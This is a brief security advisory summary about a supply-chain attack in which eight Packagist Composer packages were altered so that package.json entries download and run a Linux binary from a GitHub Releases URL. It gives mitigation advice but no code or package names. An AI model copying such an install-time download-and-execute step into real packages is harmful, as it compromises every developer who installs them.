Packagist Supply‑Chain Attack Targets Eight Composer Packages with Malicious Linux Binary
Patch: Scan Composer packages for malicious package.json entries that download binaries from GitHub Releases, and replace or remove affected packages.
Patch: Scan Composer packages for malicious package.json entries that download binaries from GitHub Releases, and replace or remove affected packages.
Summary
Security researchers have uncovered a coordinated supply‑chain attack that compromised eight Composer packages hosted on Packagist. The attackers inserted malicious code that downloads and executes a Linux binary from a GitHub Releases URL. Unlike typical attacks, the malicious payload was embedded in the package.json file rather than composer.json, targeting JavaScript‑centric projects. The eight affected packages span multiple categories, including popular libraries used in web applications. The malicious code bypasses Composer’s integrity checks and can run arbitrary commands on the host system. Developers using these packages should immediately audit their dependencies for suspicious package.json entries. Updating to the latest safe versions or removing the affected packages is essential to mitigate the risk. The incident highlights the need for vigilant dependency scanning and source verification.
Key changes
- Eight Packagist packages compromised in a coordinated supply‑chain attack
- Malicious code downloads and executes a Linux binary from a GitHub Releases URL
- Payload inserted into package.json, not composer.json
- Targets JavaScript‑centric projects
- Bypasses Composer integrity checks
- Affects multiple popular libraries
- Developers must audit dependencies for suspicious package.json entries
- Updating to safe versions mitigates the risk